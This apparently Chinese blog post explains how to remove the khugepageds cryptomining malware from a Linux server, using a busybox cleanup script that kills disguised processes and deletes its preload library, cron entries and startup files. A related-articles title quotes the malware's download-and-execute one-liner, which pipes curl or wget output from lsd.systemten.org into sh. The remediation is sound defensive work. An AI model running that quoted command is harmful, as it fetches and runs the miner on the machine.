一.背景

最近公司一台虚拟机被攻击,其中一种挖矿病毒、会伪CPU数、即如果用top命令只能看到一个cpu、并且负载不高、实际上整个负载300%以上,及时定时任务关掉也不起作用。

二.言归正传开始干掉这个麻烦的病毒(脚本如下):

      #关掉定时任务
      service crond stop
      #删除so库
      busybox rm -f /etc/ld.so.preload
      busybox rm -f /usr/local/lib/libcset.so
      chattr -i /etc/ld.so.preload
      busybox rm -f /etc/ld.so.preload
      busybox rm -f /usr/local/lib/libcset.so
      # 清理异常进程
      busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'khugepageds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox rm -f /tmp/kthrotlds
      busybox rm -f /tmp/kintegrityds
      busybox rm -f /tmp/khugepageds
      busybox rm -f /tmp/kpsmouseds
      busybox rm -f /etc/cron.d/tomcat
      busybox rm -f /etc/cron.d/root
      busybox rm -f /var/spool/cron/root
      busybox rm -f /var/spool/cron/crontabs/root
      busybox rm -f /etc/rc.d/init.d/kthrotlds
      busybox rm -f /etc/rc.d/init.d/kpsmouseds
      busybox rm -f /etc/rc.d/init.d/kintegrityds
      busybox rm -f /usr/sbin/kthrotlds
      busybox rm -f /usr/sbin/kintegrityds
      busybox rm -f /usr/sbin/kpsmouseds
      busybox rm -f /etc/init.d/netdns
      busybox rm -f /tmp/ld.so.preload*
      ldconfig
      # 再次清理异常进程
      busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'khugepageds' | busybox awk '{print $1}' | busybox xargs kill -9


# 清理开机启动项
chkconfig netdns off
chkconfig –del netdns


service crond start
echo "Done, Please reboot!"


      补充:由于近期很多人咨询有wiki,redis,jenkins中招的情况,建议尽快备份数据,重装系统,默认端口修改复杂端口,服务仅供内部使用。
												


											
Linux挖矿病毒 khugepageds详细解决步骤的更多相关文章
	

    
								
  1. "api-ms-win-crt-runtime-l1-1-0.dll 丢失"怎么办?详细解决步骤
		
    api-ms-win-crt-runtime-l1-1-0.dll 丢失 电脑找不到api-ms-win-crt-runtime-l1-1-0.dll文件解决方法: 问题描述: 1.开机提示" ...
    
		
    2. 
						
  2. Windows Azure Virtual Machine (39) 清除Linux挖矿病毒
		
    <Windows Azure Platform 系列文章目录> 1.之前客户遇到了Azure Linux CPU 100%,症状如下: 2.SSH登录到Linux,查看crontab,有从 ...
    
		
    3. 
						
  3. 解决linux挖矿病毒(kdevtmpfsi,sysupdate, networkservice)
		
    突然发现公司测试服务器CPU过高,是这两个sysupdate, networkservice进程,很明显是被挖矿了,记录下来以供参考. 病毒会把一些文件给加i锁或a锁,导致无法修改数据,所以某些操作需 ...
    
		
    4. 
						
  4. 无法将 Ethernet0连接到虚拟网络 VMnet8 以及无法使用桥接的详细解决步骤
		
    前言 首先我们需要明确如下表所示的对应关系: 网络类型 网络适配器名 Bridged   VMnet0 NAT   VMnet8 Host-only      VMnet1   解决"无法将 ...
    
		
    5. 
						
  5. navicat for mysql 连接报错1251详细解决步骤
		
    我的是8.0的版本,因为比较新的mysql采用新的保密方式所以旧的似乎不能用,改密码方式:use mysql:ALTER USER 'root'@'localhost' IDENTIFIED WITH ...
    
		
    6. 
						
  6. 转:进行vivado开发时,Generate Bitstream报错[DRC NSTD-1],详细解决步骤
		
    报错如下 [Drc 23-20] Rule violation (NSTD-1) Unspecified I/O Standard - 4 out of 142 logical ports use I ...
    
		
    7. 
						
  7. Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)
		
    概要: 一.症状及表现 二.查杀方法 三.病毒分析 四.安全防护 五.参考文章 一.症状及表现 1.CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发 ...
    
		
    8. 
						
  8. qW3xT.2,解决挖矿病毒
		
    在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置. 在晚上一点左右.阿里云给我发短信,告诉我服务器出现紧急安全事件.建议登录云盾-态势感知控制台查看详情和处理. 于 ...
    
		
    9. 
						
  9. Linux Makefile文件编写详细步骤与实践
		
    Linux Makefile文件编写详细步骤与实践 1.makefile概述 Windows环境下IDE会帮你完成makefile文件的编写,但在UNIX环境下你就必须自己写makefile了,会不会 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Django+xadmin打造在线教育平台(五)
			
    目录 在线教育平台(一)      在线教育平台(二) 在线教育平台(三)      在线教育平台(四) 在线教育平台(五)      在线教育平台(六) 在线教育平台(七)      在线教育平台( ...
    
			
    2. 
						
  2. python库pandas简介
			
    pandas是基于numpy的数据分析模块,提供了大量标准模型和高效操作大型数据集所需要的工具. pandas主要提供了3种数据结构:1.Series,带标签的一维数组:2.DataFrame,带标签 ...
    
			
    3. 
						
  3. jieba库分词
			
    (1)团队简介的词频统计 import jieba import collections s="制作一个购票小程序,这个购票小程序可以根据客户曾经的购票历史" s+="和 ...
    
			
    4. 
						
  4. Java中的String类型
			
    1.基本类型和引用类型 在C语言里面,是有指针这么一个变量类型的,指针变量保存的就是所要指向内容的地址.在Java里面,没有了指针的这么个说法,而是换了一个词:引用类型变量. 先说Java里面的基本类 ...
    
			
    5. 
						
  5. QPropertyAnimation实现图形,控件的旋转和位移动画,尤其是旋转
			
    QPropertyAnimation可以简单方便的实现对象的旋转和移动的动画效果. 1. 移动 Pixmap *item = new Pixmap(kineticPix); QPropertyAnim ...
    
			
    6. 
						
  6. Java NIO核心组件简介
			
    原文链接:http://tutorials.jenkov.com/java-nio/overview.html NIO包含下面几个核心的组件: Channels Buffer Selector 整个N ...
    
			
    7. 
						
  7. Oracle-07:别名,去重,子查询
			
    ------------吾亦无他,唯手熟尔,谦卑若愚,好学若饥------------- 依旧提供数据库脚本供操作 create table DEPT ( deptno ) not null, dna ...
    
			
    8. 
						
  8. MIT KIT OpenID Connect Demo Client
			
    Hello world! You are NOT currently logged in. This example application is configured with several pa ...
    
			
    9. 
						
  9. aliyun TableStore相关操作汇总
			
    总结:这个东西本身可能技术还不成熟,使用的人少,有问题很验证解决 遇到的问题:(1)没有一个GUI工具,使用门槛高(2)查询的GetRange不方便,把查询出来的数据使用System.out.prin ...
    
			
    10. 
						
  10. MySQL中group_concat函数深入理解
			
    本文通过实例介绍了MySQL中的group_concat函数的使用方法,比如select group_concat(name) . 一.MySQL中group_concat函数 完整的语法如下: gr ...
    
			
    11.